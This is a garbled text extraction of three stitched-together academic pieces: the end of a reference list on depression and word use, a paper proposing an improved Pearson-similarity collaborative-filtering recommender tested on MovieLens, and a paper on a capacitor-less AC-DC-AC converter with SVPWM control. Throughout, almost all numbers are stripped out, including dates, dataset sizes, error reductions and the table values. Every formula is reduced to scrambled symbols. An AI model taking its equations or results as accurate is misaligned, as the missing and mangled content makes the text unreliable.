tom pyszczynski and jeff greenberg. . self- regulatory perseveration and the depressive self- focusing style: a self-awareness theory of reactive de- pression. psychological bulletin, ( ). tom pyszczynski, kathleen holt, and jeff greenberg. . depression, self-focused attention, and ex- pectancies for positive and negative future life events for self and others. journal of personality and social psychology, ( ). nairan ramirez-esparza, cindy chung, ewa kacewicz, and james w. pennebaker. . the psychology of word use in depression forums in english and in span- ish: testing two text analytic approaches. in icwsm. shiquan ren, hong lai, wenjing tong, mostafa amin- zadeh, xuezhang hou, and shenghan lai. . non- parametric bootstrapping for hierarchical data. jour- nal of applied statistics, ( ). alan ritter, colin cherry, and bill dolan. . unsu- pervised modeling of twitter conversations. in hlt- naacl. harvey sacks and gail jefferson. . lectures on con- versation. wiley-blackwell. andreas stolcke, klaus ries, noah coccaro, eliza- beth shriberg, rebecca bates, daniel jurafsky, paul taylor, rachel martin, carol van ess-dykema, and marie meteer. . dialogue act modeling for automatic tagging and recognition of conversational speech. computational linguistics, ( ). yla r. tausczik and james w. pennebaker. . the psychological meaning of words: liwc and comput- erized text analysis methods. journal of language and social psychology, ( ). http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml teun van dijk. . discourse studies: a multidisci- plinary approach. sage. world health organization. . depression: fact sheet no . http://www.who.int/ mediacentre/factsheets/fs /en/. re- trieved november , . jaewon yang, julian mcauley, jure leskovec, paea lependu, and nigam shah. . finding pro- gression stages in time-evolving event sequences. in www. http://www.who.int/mediacentre/factsheets/fs /en/ http://www.who.int/mediacentre/factsheets/fs /en/ paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) a collaborative filtering recommendation algorithm with improved similarity calculation yang ju a , liu bailin b and zhao zhixiang school of computer science and engineering, xi'an technological university xi'an, , shaanxi state and provincial joint engineering lab. of advanced network and monitoring control xi'an, , china e-mail: a yangju @ .com, b @qq.com abstract—in order to improve the accuracy of the proposed algorithm in collaborative filtering recommendation system, an improved pearson collaborative filtering (ip-cf) algorithm is proposed in this paper. the algorithm uses the user portrait, item characteristics and data of user behavior to compute the baseline predictors model. instead of the traditional algorithm's similarity calculation, the prediction model is used to improve the accuracy of the recommendation algorithm. experimental results on moivelens dataset show that the ip-cf algorithm significantly improves the accuracy of the recommended results, and the rmse and mae evaluation results are better than the traditional algorithms. keyword-recommendation algorithm; collaborative filtering; similarity calculation; baseline predictors model i. introduction with the rapid development of computer technology and network technology, the number of network information services and applications is growing rapidly. china internet network information center reported statistics, as of june , the size of china's internet users reached million, a total of . million new netizens in half a year [ ] . with the increase in the number of people on the internet, internet information has also seen explosive growth. how to find interesting and effective information in this vast data is a very difficult thing. in order to solve this problem, academia and industry put forward personalized recommendation system [ ] . according to the user's personal information and historical habits, it can discover the potential interest of the user and recommend the resources of interest to the user actively. personalized recommendation system is a special form of information filtering system [ ] . the recommendation system can be divided into the following categories: collaborative filtering recommendation system, content-based recommendation system and hybrid recommendation system. because of its wide applicability, strong interpretability and good stability, the collaborative filtering recommendation system based on neighborhood model is widely used in various fields. therefore, this paper focuses on the collaborative filtering recommendation system based on neighborhood model. the accuracy of recommendation results in the recommendation system is the main index to measure the recommendation effect. sarwar et al. [ ] proposed an item- based collaborative filtering recommendation algorithm that looked into cosine-based similarity to compute the similarity between products. this method provides dramatically better performance than traditional recommendation algorithm, while at the same time providing better accuracy. chen and cheng [ ] use the rating data to compute the similarity between users, and use the ranking data as the weight of similarity calculation. yang and gu [ ] propose to use user behavior information to construct the user's interest points and use the interest points to compute the similarity between users. experiments show that these methods are better than the classic collaborative filtering algorithm. however, these methods only consider the user-item behavioral data, and neglect the user portrait and item features, which causes deviations in the accuracy of the recommendation result. this paper improves similarity calculation method in collaborative filtering recommendation algorithm based on neighborhood model, and uses the user portrait, item characteristics and user-item behavior data to compute similarity. we experimentally evaluate our results and compare them to the classic collaborative filtering algorithm. experiments suggest that the improved similarity calculation method can improve the accuracy of the recommended results. ii. collaborative filtering recommendation algorithm based on neighborhood model collaborative filtering recommendation algorithm is to select the same custom hobby user groups, use other people's experience to meet their own needs, in order to achieve the purpose of reducing overhead. typically, the workflow of a collaborative filtering system is: ( ) compute the similarity between users. ( ) determine the neighbor set. find the k users whose user interest is the most similar through the similarity size, and set these users as the user sets. ( ) according to the user sets prediction rating. the system recommends items that the users have rated highly but not yet being rated by this user. the most important thing in collaborative filtering algorithm is similarity calculation. for the calculation of international conference on sensor network and computer engineering (icsnce ) similarity, the researchers put forward a variety of similarity calculation methods. cosine-based similarity: for user u and user v , ( )n u denotes the set of positive feedback items for user u , and ( )n v denotes the set of positive feedback items for user v . and similarity between items u and v , denoted by ( , )sim u v is given by: )()( )()( ),( vnun vnun vusim    pearson correlation coefficient [ - ] : in this case, similarity is computing based on the vector of the rating. among them, u r in the formula has two forms in the traditional recommendations. one is the average rating of user u , and the other is the average rating of item i scored by all users. the pearson correlation is given by: ( )( ) (u,v) ( ) ( ) uv uv uv ui u vi v i i ui u vi v i i i i r r r r sim r r r r             the similarity between users can be calculated by the above formula, and the similarity ranking of each user with other users can be obtained to obtain the nearest neighbor user set. after getting the user set, the next step is interest prediction computation. we can denote the prediction ( , )p u i as:    )(),( ),(),( inkusv virvusimiup  iii. improved similarity measures this paper considers the user rating data from the overall situation, introduces the characteristics of personal habits, item quality and category to improve the similarity computation formula. thus the approximated correlation coefficient is given by:        nmnm nm pv nini pv mimi pi ninimimi nm brbr brbr s ,, , , )()( ))((  here, ,m n s denotes the similarity between user m and n. mi r is the raw rating of the user m for the item i . ,m np represent the user m, n common rating set. mi b is a baseline predictors for rating mi r . the baseline predictors model is as follows:    igg gimmi cbbb    denotes the intercept of the baseline predictors model. the parameters m b and i b indicate the deviations of user m and item i , respectively, from the average. the last term of the formula denotes the preference of the user on the item category. i g represents the set of categories to which the item belongs. here we use an example to illustrate the baseline predictors model. create a baseline predictors model for the rating of movie i for user m . assume that the mean rating of all the movie scores is . . m is a critical user, who tends to rate . stars lower than the average. i is a movie with a relatively high standard, so its rating is . stars higher than the average rating. in addition, the movie i belong to , , x y z c c c , with a bias relative to the average of - . , . , . . therefore, the prediction for the movie i rating by user m is . - . + . - . + . + . = . . for this formula, the purpose is to find m b , i b and g c . this paper solves the problem by solving the least-squares problem [ - ] . the cost function formula is as follows:    igg giumimi cbbre   )()(min ),(        ii ii gg gi um m im mi i cbbe    in the above ( ) formula, r mi is the true value of user for item. in formula ( ),  represents the set of user ratings for items, u represents user set, and i represents the set of item. the solution process is to obtain the best fitting m b , i b and g c by minimizing the first term ( , ) ( ) mi m i e   in equation ( ). the second item is the l regular, that is added to prevent overfitting. the size of  indicates the degree of intervention to fit, and the larger the general  is, the smoother the fitting curve is. because the proposed model of this paper is different from the traditional one, the data matrix cannot be directly applied to the training of the model. so the matrix of the training data is restructured, adding personal habits, item quality and category bias. for example, when a movie i was released, it was called a masterpiece of elements such as comics, entertainment, suspense, etc. these classified data were useful for the model but could not be used. through the transformation of the data format, useful information is used, and the information is vectorized according to the classification categories. each row of data through the transformation training matrix can be expressed as: {( , ), ... , ... , ... , | } m n j ui u i u u i i c c r c g . international conference on sensor network and computer engineering (icsnce ) table i. training data matrix ),( iu u ... mu i ... ni c ... jc uir ( , ) ... ... ... ... ... ... ... ... ... ... ... ... ... ... ( ,n) ... ... ... ... ... ... ... ... ... ... ... ... ... ... (m,n) ... ... ... table ii. moivelens dataset information version users movies size sparsity ml k . % the training data matrix is shown in table . the complete algorithm steps are described as follows: a) compute the baseline predictors model. according to the formula ( ) combined with the rating matrix, personal habits, item quality and category, the least square method is used to solve for mi b , m b , i b , and i g g g c   . the solution formulas are ( ) and ( ). b) compute similarity. using formula ( ), compute the similarity between each two users. c) getting a set of nearest neighbors. according to the similarity computed in the steps (b), we sort the nearest neighbors of user m that need to be predicted, and determine the relevant user set k m s according to sorting order and k. d) rating prediction. according to formula ( ), system recommends items that the users have rated highly but not yet being rated by this user. iv. experimental evaluation a. data set and evaluation metrics in order to verify the actual recommendation effect of the proposed algorithm (improved pearson similarity collaborative filtering, ip-cf) in this paper, the moivelens film data set was used for verification. this data set consists of: ① , ratings ( - ) from users on movies. ②user data and item data have simple feature portraits. ③ users with less complete personal portraits and fewer comments in the data have been cleaned. the dataset information is shown in table . select the root mean square error (rmse) and mean absolute error (mae) to evaluate the accuracy of the recommendation algorithm on the rating data [ - ] . the smaller the value, the higher the accuracy of the prediction. for a user u and item i in the test set, uir is the actual rating, uir̂ is the predicted rating, and t is the total number figure . comparison of precision between ipcf algorithm and traditional algorithm of items that need to be predicted. the rmse and mae formulas are as follows:     tiu uiui rr t rmse , ˆ     tiu uiui rr t mae , ˆ  b. experimental results ) comparison of accuracy of recommendation algorithms the traditional cosine similar algorithm (cosine-cf) and pearson similar algorithm (pearson-cf) were compared with the proposed algorithm (ip-cf). we tested them on our data sets by computing rmse and mae. the size k of similar user set is from to . figure shows the experimental results. it can be observed from the results that the rmse and mae values of the improved similarity algorithm proposed in this paper decrease with the increase of the neighborhood. when the number of near-neighbor sets reaches a certain amount, it tends to a fixed value. the traditional collaborative filtering algorithm (pearson similarity and cosine similarity) needs to find the optimal result, if the number is too large, it will affect the accuracy of the recommendation result. overall, the rmse and mae of the rating prediction are . % and . % lower than the figure . comparison between the baseline predictors model and the traditional model international conference on sensor network and computer engineering (icsnce ) traditional algorithm respectively. the ip-cf algorithm has better accuracy. ) comparison of accuracy of baseline predictors the following experiments verify the effectiveness of the baseline predictors model. the experiment compares the user mean model (bu), basic baseline predictors model (bp), and improved baseline predictors model (ubp). experimental results show that the improved baseline predictors model significantly improves the accuracy of the baseline prediction. v. conclusion in this paper, a collaborative filtering recommendation algorithm based on improved similarity computation is proposed, which takes into account user portrait, item characteristics and user behavior data in recommendation process. experiments have shown that user portraits and item features played an important role in improving the accuracy of recommendations, and which are an important basis for analyzing potential needs. secondly, we found that in the top-n recommendation, the number of neighbors and the evaluation index are not a positive or negative relationship, and the size of the neighbor will affect the accuracy of the recommendation. our further work will research the relationship between the number of neighbors and the effectiveness of recommendations, especially how to choose the best neighbor value to improve the accuracy of recommendations. references [ ] statistical report on internet development in china[r]. china internet network information center, . [ ] borkar v, carey mj, li c. inside big data management:ogres, onions, or parfaits[c]. proceedings of the th international conference on extending database technology. acm, : - . [ ] wang guoxia, liu heping. survey of personalized recommendation system[j]. computer engineering and applications, , ( ), - . [ ] sarwar b, karypis g, konstan j, et al. item based collaborative filtering recommendation algorithms[c]. proc th int’l www conf, hong kong, : - . [ ] chen yl , cheng lc. a novel collaborative filtering approach for recommending ranked items[c]. expert systems with applications, , ( ): - . [ ] yang mh, gu zm. personalized recommendation based on partial similarity of interests[c]. advanced data mining and applications proceedings, , : - . [ ] fu he-gang, wang zhu-wei. improvement of item-based collaborative filtering algorithm[j]. journal of chongqing university of technology(natural science), ( ): - . [ ] guo lei, ma jun. incorporating item relations for social recommendation[j]. chinese journal of computers, , ( ): - . [ ] x. luo, xia, y. and zhu, q. incremental collaborative filtering recommender based on regularized matrix factorization[j]. knowledge-based systems, , , pp. - . [ ] sun chen, xi hongsheng, gao rong. a recommendation-support model using neighborhood-based linear least squares fitting[j]. journal of xi'an jiaotong university, , ( ), - . [ ] c. rana, and jain, s.k. a study of the dynamic features of recommender systems[j]. artificial intelligence review, , ( ), pp. - . [ ] item-network-based collaborative filtering: a personalized recommendation method based on a user’s item network[j]. taehyun ha, sangwon lee. information processing and management. ( ). [ ] gai li, zhiqiang zhang, et al. one-class collaborative filtering based on rating prediction and ranking prediction[j]. knowledge- based systems. . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , one novel control strategy for ac-dc-ac converter without dc link electrolytic capacitor shihong xie school of electrical and information engineering shaanxi university of science & technology xi’an, china e-mail: xierthy@ .com yanjing meng school of electrical and information engineering shaanxi university of science & technology xi’an, china e-mail: yjm @ .com abstract—a novel control strategy for ac-dc-ac converter without electrolytic capacitor is proposed to settle the disadvantage of the traditional converter caused by large electrolytic capacitors. this study is developed in four parts: first, after analyzing for the large electrolytic capacitor defect, one novel electrolytic capacitor-less converter and its control strategy are proposed; second, the efficiency of voltage conversion for the novel converter is deduced and compared with the conventional converter, third, the mathematics model of the converter is built; forth, some simulation tests are carried out to verify the performance of converter. the simulation results show that the proposed converter is valid. keywords-converter; electrolytic capacitor; six-pulse voltage; mathematic model; energy feedback i. introduction the traditional voltage ac-dc-ac converters have been widely used in many domains. in view of filtering and energy saving, many large electrolytic capacitors are often connected to the dc link of the traditional converter. but these electrolytic capacitors have many disadvantages such as big volume, high cost and short life [ - ] . these disadvantages will result in the converter losing efficacy. so, one novel converter without electrolytic capacitor is considered as a solution for the disadvantages of the traditional converter. numerous articles explore the solution in recent years. one topology of electrolytic capacitor-less converter was presented in [ - ]. one feed-forward compensation control scheme is applicable to resist the influence of improper input voltages in [ ]. the resistance-inductance load but three- phase induction motor load tested in the article couldn’t completely verify the performances of the supposed converter. one proportional-resonant control of a single- phase to three-phase converter without electrolytic capacitor is proposed in[ ].but power of the converter with a single- phase input power source is limited in [ - ]. in [ ], one energy feedback system built on amplitude and phase control sinusoidal pulse wide modulation(spwm) technology was putted forward. the system could improve the control performance of energy feedback current, but employed the double quantity of electrolytic capacitors of the traditional converter. in [ ], a direct ac-ac converter connected by high frequency transformer is proposed. this converter could serve as one phase or three phases energy conversion equipment. nonetheless, the volume of the high frequency transformer restricted the largest power of this converter. on the other hand, electrolytic capacitor also exists in this converter. contrasting to above schemes, one ac-dc-ac converter without dc link electrolytic capacitor proposed in [ - ] gets a better scheme to settle these disadvantages of the traditional converter. this converter includes two back- to-back voltage source inverters and there is only a five microfarad ceramic capacitor in its dc link. nonetheless, the dynamic deviation of the dc link voltage reaches twenty volts that isn’t a favorable performance. in [ - ], other circuit topologies of converter without electrolytic capacitor are also proposed, but main content is to study power-decoupling of a multi-port isolated converter in [ ], and the theme is to solve the high-frequency pulsating of three-phase converter in [ ]. inspired by above articles, the paper presents an electrolytic capacitor-less converter that its dc link voltage is six pulse voltage. the first content is to analyze the fundamental function of the dc link electrolytic capacitor and put the novel converter topological structure. the second content is to deduce the voltage conversion efficiency of the proposed converter. and the third is to build the model of the converter-motor system and test the performance of the system. ii. the converter without electrolytic capacitor a. the analysis for dc link electrolytic capacitor of the traditional converter dc link electrolytic capacitors of the conventional voltage source ac-dc-ac converter have two fundamental functions. the first is voltage smoothing. the output voltage of the front-end rectifier of the converter is a pulsation dc voltage. the voltage rectified by six diodes consists of six sinusoid-heads in one power source period and contains the heavy harmonic. however, one constant dc voltage is expected to the inverter of the conventional converter. many electrolytic capacitors can be paralleled on the dc link of the converter to smooth the pulsation dc voltage. the second function of electrolytic capacitor for the traditional converter is energy stockpiling. when instantaneous value of the input ac line voltage of the traditional converter feeding a doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , induction motor is larger than the value of dc link voltage, the front-end rectifier is in on work, the input power source feeds the electrolytic capacitors and load. on the contrary, the front-end rectifier is disabled and the electrolytic capacitors feeds the motor. on another condition, when the motor is reducing speeds, the stator voltages are higher than the dc link voltage and energy feeds back to the electrolytic capacitors. so, above two functions should be disposed in another new converter system in that the electrolytic capacitors are removed from the dc link of converter. b. the converter topology one novel electrolytic capacitor-less converter topology is showed in figure . power-side rectifier is composed of six diodes. and the load-side inverter is composed of six insulated gate bipolar transistors(igbt) and every igbt is severally paralleled with a backward diode. the differences of the novel converter comparing with the traditional is that capacitor c paralleled on the dc link is a small non-polarity thin-film capacitor and every igbt of the power-side inverter is paralleled with a resistance-capacitor protection circuit. the small capacitor is expected to absorb the peak voltage generated by switching action. basing the purpose of the novel converter, energy from the motor can be fed back to the power grid and a dc link six-pulse voltage composing of six sinusoid-heads in one period can be maintained. the power-side inverter feeding energy back to the power grid can be controlled with a simple method. the power-side inverter will be triggered only when the dc link voltage pumped by the feedback energy is greater than the expected six-pulse value. the control principle is that the igbt corresponding with the conductive diodes of the power-side rectifier will be triggered. for example, when the diodes of a-phase up bridge arm and b-phase down bridge arm of the power-side rectifier are conductive, the dc link voltage is equal to input line voltage uab. if motor energy starts to feed back to capacitor c, dc link voltage will be higher than the input line voltage uab, the above conductive two diodes will be turn-off naturally and the igbt of a- phase up bride arm and b-phase down bridge arm of the power-side inverter will be triggered. ua ub uc ua ub uc c + - ud figure . topology of converter without electrolytic capacitor c. voltage conversation efficiency of the novel inverter in order to analyze the output voltage of the novel converter, voltage conversation efficiency is defined as the following. o i u u  ( ) in this equation, o u is the effective value of fundamental wave of the output voltage and i u is the phase voltage effective value of the three phases input voltages of the converter. the space vector pulse width modulation(svpwm) technology can be used to enhance the voltage conversation efficiency and reduce the output voltage harmonic. basing this technology, the triggering time of every igbt device will be computed precisely in accordance with the instantaneous dc link voltage. hence, the disturbance caused by the change of dc link voltage has been restrained. on the other hand, the harmonic generated by the sampling period is further reduced because the switch frequency of igbt is higher than the frequency of input voltage. many presented papers verify the performance of the svpwm method[ - ]. space voltage vector is defined as the following. a b c ( ) jr j r sv u u e u e   ( ) in this equation, r is equal to two thirds  . if ua, ub, and uc are three-phase balanced voltages, the following equation can be acquired. jr s m m j m j m j u cos( ) u cos( - ) u cos( ) u e v e r t t s v t t e t e                  ( ) in this equation, um is the amplitude of the phase-voltage, vs is the amplitude of the space voltage vector. the switching vector of the inverter up-arms is defined as (sa,sb,sc). when a-phase up-arm igbt is triggered and a- phase down-arm igbt will be closed, sa is equal to one. on the contrary, sa is equal to zero. the means of sb, and sc are consistent with sa. the output voltage vector of the converter can be signed vi(i= , , … , ). v and v are two zero vectors. another six vectors are nonzero vectors drawn in figure . the nonzero vectors are defined as the following. international journal of advanced network, monitoring and controls volume , no. , ( ) i j i dv u e    ,(i= , … ) ( ) in this equation, ud is the dc link voltage of the converter. the size of ud is set as the amplitude and ω t is set as the argument of a variable in another two-phase static coordinate system named α -β coordinate system. the track of ud is the envelope line shown in figure . in this coordinate system, zero time reference is set in the time that the amplitude of ud reaches the largest value. the angle between α and α is signed as θ, which indirectly reflexes the phase-difference of output voltage and input power source of the converter. the effective range of θ is between zero and one third π. figure . dc-link voltage and space voltage vector if the track of magneto-motive force generated by vs is rounded, the track of vs must also be rounded. the largest track of vs is the in-circle of the hexagon forming with six nonzero vectors shown in figure . so, the following formula can be reasoned. smax i v d v u  ( ) in this equation, smax v is the largest amplitude of vs. but dc link voltage of the novel converter is a six-pulse voltage, and the voltage changes between um/ and m u . so, the largest amplitude range of vs is shown as the following formula. ' m max m u v u s  ( ) in this equation, the cause of the maximum amplitude changing is the phase difference between input voltage and output voltage. that is to say the cause is θ. if θ is equal to π/ , vˊsmax will reach the maximum value. similarly, if θ is equal to zero, vˊsmax will reach the minimum value. so, the voltage conversation efficiency of the novel converter can be calculated by using ( ) and ( ) .   ( ) in conclusion, the voltage conversation efficiency of the novel converter is influenced by the phase difference of input voltage and output voltage, but the maximum efficiency is equal to the efficiency of the traditional converter. d. converter mathematics model when dc link voltage of the novel converter is six-pulse voltage, it will be calculated in the following equation. d a a b b c cu k u k u k u   ( ) in this equation, ka, kb and kc are the conversion function of the power-side rectifier shown in figure . they can be calculated by the following equation. , max( , , ) , min( , , ) max( , , ) , min( , , ) j a b c j a b c j a b c j a b c u u u u k u u u u u u u u u u u          ( ) in this equation, j is equal to a , b ,or c . for the novel converter, when ka is equal to one, kb is equal to negative one, kc is equal to zero and vi is equal to v or v , the equivalent circuit model of converter-motor system is shown in figure . the equivalent circuit in other switch states can also be acquired by the same methods. o o' + - + - + - ua ub uc + - ud ua ub o + - + - + - + - ud ua ub ua ub uc o' (a) (b) figure . inverter equivalent circuit supposing that an induction motor is fed by the novel converter. every phase voltage can be derived from the figure . in figure (a), three phase-voltages can be computed by using the following equation. a d b c d u u u u u         ( ) international journal of advanced network, monitoring and controls volume , no. , in figure (b), these voltages can be acquired in the following equation. a c d b d u u u u u         ( ) with the same method, three phase-voltages can be unified in one equation as the following. a a d b b cc u s u u s su                              ( ) math model of the novel converter can be acquired by using ( ) and ( ) as the following formula. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) a a a b c b a b c b a b a c b b a c a c a b b b a cc c a b c a c b a c b c c a b c u k s s s k s s s u k s s s k s s s k s s s k s s su k s s s u k s s s u k s s s u                                                   ( ) in this equation, (ua,ub,uc) is the input voltage of the converter, (ua,ub,uc) is the output voltage of the converter, (ka, kb, kc )is the conversation function of the power-side rectifier and (sa,sb,sc) is the switch function of the load-side inverter. iii. simulation and analysis a. simulation of converter driving resistance-induction load simulation system is built to verify the performance of the novel converter. the converter drives a resistance- induction load, which is consisted of a resistance and a induction. the resistance is zero point five ohm and the induction is millihenry. the svpwm technology is used to control the load-side inverter of the converter and the switch frequency of the inverter is ten thousands hertz. input voltage of the converter is three hundred and eighty voltage. frequency of input voltage is fifty hertz. output voltage size is linearly acted in line with it’s the frequency. the parameter of film-capacitor is thirty three microfarad. the parameter of electrolytic capacitor of the traditional converter is four thousands and seven hundreds microfarad, which is developed by the target that wave voltage are less than five percent. simulation software is matlab r a. simulation algorithm is ode tb and maximum step is ten microsecond. θ showed in figure is one-sixth π. . . . . u d / v o lt (a) time /s . . . . u d / v o lt (b) time /s figure . contrast of dc-link voltage of two converters with resistance- inductance load the simulation results are shown in figure and table . figure (a) is the dc link voltage of the novel converter. corresponding to figure (a), figure (b) is the voltage of the traditional converter. when the frequency of output voltage changes from five hertz to fifteen hertz, thirty hertz and fifty hertz, the effective values of output voltage fundament component, the harmonic sizes and the maximum conversation efficiency are shown in table . table i. performance contrast of two converter with same load of resistance and inductance item frequency new converter traditional converter thd hz . . hz . . hz . . hz . . uab(v) hz . hz . hz . . hz . . η hz . . b. simulation of converter driving induction motor in order to further test the performance of the novel converter, an induction motor is driven by the novel converter and the traditional converter. vector control technology is employed in this converter-motor system. a break resistance is paralleled on dc link of the traditional converter. the parameters of two converters and simulation condition are identical as the previous. simulation results are shown in figure - and table . figure shows the speed response of a motor fed by above two converters. figure shows the dc link voltage of above two converters. figure shows the electromagnetic torque responses. when the frequency of the output voltage changes from five hertz to fifteen hertz, twenty five hertz and fifty hertz, the effective values of the output voltage fundament component, the harmonic sizes and the maximum conversation efficiency are shown in table . international journal of advanced network, monitoring and controls volume , no. , . . . . . r o to r s p e e d /r p m time /s figure . contrast of speeds of a motor fed by two converters with vector control (a) (b) figure . the dc link voltages of two converters with a motor load. (a) the novel. (b) the traditonal . . . . - - t/s is a /a novel converter traditional converter figure . stator current response of induction motor starting process table ii. performance contrast of two converters with a motor load item frequency new converter traditional converter thd (%) hz . . hz . . hz . . hz . . uab (v) hz . . hz . . hz . . hz . . η hz . . c. simulation tests about mathematic model some tests based on the mathematics model are intended to verify the veracity of the mathematical model of the novel converter. on the contrast, another tests based on the novel converter are further implemented, which is built by simpowersystem toolbox. testing condition is same. simulation results are shown in figure and table . figure (a) is the output line-voltage of the converter basing on the topology. on the contrast, figure (b) is the output line voltage of the converter based on mathematics model. fundamental wave effective value along with harmonic of output line voltage is shown as table . . . . . . . - u d/ vo lt (a) t/sec . . . . . . - u ab /v ol t (b) t/sec figure . output voltage of two models of converter. (a) the mathematical model. (b) the novel converter table iii. harmonic of output voltage of converter item frequency basing on the mathematic model basing the topology thd( %) hz . . hz . . hz . . uo hz . . hz . . hz . . d. the results analyzing figure shows that the voltages on dc link fit the expected voltages for two converters. figure (a) demonstrates that the dc link voltage of the novel converter is six-pulse wave voltage. figure (b) demonstrates that the dc link voltage of the traditional converter is an approximately constant dc voltage, whose ripple is less than five percent. figure shows that the rotor speed performance of an induction motor fed by the novel converter is same as the traditional. international journal of advanced network, monitoring and controls volume , no. , figure shows that the dynamic error of the dc link voltage of the novel converter driving an induction motor is smaller than the traditional. figure (a) demonstrates that the dc link voltage of the novel converter maintains six-pulse voltage. however, figure (b) demonstrates that the dc link voltage of the traditional converter has a larger error than the novel converter. figure shows that a-phase stator currents of an induction motor fed by two different converters have the same performance. data in table show that the maximum voltage conversion efficiency of the novel converter is equal to the traditional. the harmonic and the output voltage at different frequency of the novel is similar to the traditonal. data from table except the harmonic of the output voltage at fifty frequency show that the novel converter has the similar performance with the traditional. output voltage in figure and the data in table show that the mathematical model of the novel converter has the same performance with the novel converter. so the model is accurate. iv. conclusion the electrolytic capacitor-less ac-dc-ac converter proposed in this paper has the following characteristic. ( ) the novel topology is effective for driving an induction motor. ( ) the dc link voltage is a six-pulse voltage. ( ) the harmonic of the output voltage caused by the six- pulse voltage on dc link is similar to the traditional. ( ) the voltage conversation efficiencies of the novel converter feeding two different loads are equal to the traditional. ( ) simulation results show that the mathematics model of the novel converter is accurate and easy to build. acknowledgment this work was supported by china nature science foundation( ) references [ ] lu xiwei liu zhigang wang lei. estimate approach for fatigue damage of aluminum electrolytic capacitor based on accumulated damage theory[j]. transactions of china electro technical society, ,( ): - . doi: . /j.cnki. - .tces. . . [ ] niu, h., wang, s., ye, x., et al. “lifetime prediction of aluminum electrolytic capacitors in led drivers considering parameter shifts,” oct.vol.( - ), , - , doi: . /j.microrel. . . [ ] hadeed ahmed sher, khaled e. addoweesh, yasin khan. effect of short circuited dc link capacitor of an ac–dc–ac inverter on the performance of induction motor[j].journal of king saud university – engineering sciences, , : – . [ ] hadeed a shera, khaled e addoweesh, zorays khalid, etc. theoretical and experimental analysis of inverter fed induction motor system under dc link capacitor failure[j]. journal of king saud university- engineering sciences, , ( ): - . [ ] dai bin, zhao run-lin, shang dong-juan. research on output control of high-performance single-phase voltage-source inverters[j]. electrical measurement & instrumentation, , ( ): - .doi: - ( ) - - . [ ] h. luo, g.p. wu, q yin, “proportional-resonant control of a single- phase to three-phase converter without electrolytic capacitor,” proc. chinese automation congress(cac ), nov. , pp. - ,doi: . /cac. . [ ] zhang chenghui, li ke, du chunshui,etc. an energy-feedback control system of inverter based on phase and amplitude control[j]. transactions of china electrotechnical society, , ( ): - . doi: . /j.cnki. - .tces. . . [ ] hemalatha s, a. maheswari. direct ac-ac converter with high frequency link transformer using sinusoidal pwm technique[j]. south asian journal of engineering and technology vol. , no. ( ) – . [ ] kim joohn sheok, sul seung ki. new control scheme for ac-dc- ac converter without dc link electrolytic capacitor[j].ieee annual power electronics specialists conference, p - , [ ] c.c. hou, h.p. su, “multi-carrier pwm for ac-dc-ac converter without dc link electrolytic capacitor,” international power electronics conference(ipec-hiroshima-ecce asia ), may , pp. - , doi: . /ipec. . [ ] m.s. irfan, j.h. park, “power-decoupling of a multiport isolated converter for an electrolytic-capacitorless multilevel inverter,” ieee transactions on power electronics, , , ( ), pp. - . doi: . /tpel. . [ ] montie a. vitorino, luciano f. s. alves, f.m.p. italo roger, et al, “high-frequency pulsating dc-link three-phase inverter without electrolytic capacitor,” conf. proc. ieee appl. power electron. conf. expo.(apec ), march , pp. - , doi: . /apec. . [ ] lu yuan, hu binghui, zhang junwei ,etc. a three-segment algorithm research based on svpwm modulation[j]. power system protection and control, ,( ): - . [ ] zhou juan wei chen yang yu,etc. inverter simplified algorithm of pwm and inhibit common-mode voltage strategy[j]. transactions of china electro technical society, ,( ): - . http://apps.webofknowledge.com/oneclicksearch.do?product=wos&search_mode=oneclicksearch&excludeeventconfig=excludeiffromfullrecpage&colname=wos&sid= cuyv o dhcbptbvyd&field=au&value=niu,% h http://apps.webofknowledge.com/oneclicksearch.do?product=wos&search_mode=oneclicksearch&excludeeventconfig=excludeiffromfullrecpage&colname=wos&sid= cuyv o dhcbptbvyd&field=au&value=wang,% s https://www.engineeringvillage.com/search/submit.url?cid=quicksearchcitationformat&implicit=true&usageorigin=recordpage&category=authorsearch&searchtype=quick&searchword =% bluo% c+hui% d§ion =au&database= &yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?cid=quicksearchcitationformat&implicit=true&usageorigin=recordpage&category=authorsearch&searchtype=quick&searchword =% bwu% c+genping% d§ion =au&database= &yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?cid=quicksearchcitationformat&implicit=true&usageorigin=recordpage&category=authorsearch&searchtype=quick&searchword =% byin% c+quan% d§ion =au&database= &yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?cid=quicksearchcitationformat&implicit=true&usageorigin=recordpage&category=authorsearch&searchtype=quick&searchword =% bsu% c+hsin-ping% d§ion =au&database= &yearselect=yearrange&sort=yr http://apps.webofknowledge.com/daisyoneclicksearch.do?product=wos&search_mode=daisyoneclicksearch&colname=wos&sid= elxbjfdq nwvr llq&author_name=irfan,% ms&dais_id= &excludeeventconfig=excludeiffromfullrecpage http://apps.webofknowledge.com/daisyoneclicksearch.do?product=wos&search_mode=daisyoneclicksearch&colname=wos&sid= elxbjfdq nwvr llq&author_name=park,% jh&dais_id= &excludeeventconfig=excludeiffromfullrecpage https://www.engineeringvillage.com/search/submit.url?cid=quicksearchcitationformat&implicit=true&usageorigin=recordpage&category=authorsearch&searchtype=quick&searchword =% bvitorino% c+montie+a.% d§ion =au&database= &yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?cid=quicksearchcitationformat&implicit=true&usageorigin=recordpage&category=authorsearch&searchtype=quick&searchword =% balves% c+luciano+f.+s.% d§ion =au&database= &yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?cid=quicksearchcitationformat&implicit=true&usageorigin=recordpage&category=authorsearch&searchtype=quick&searchword =% bda+silva% c+italo+roger+f.+m.+p.% d§ion =au&database= &yearselect=yearrange&sort=yr https://www.engineeringvillage.com/search/submit.url?cid=quicksearchcitationformat&implicit=true&usageorigin=recordpage&category=authorsearch&searchtype=quick&searchword =% bda+silva% c+italo+roger+f.+m.+p.% d§ion =au&database= 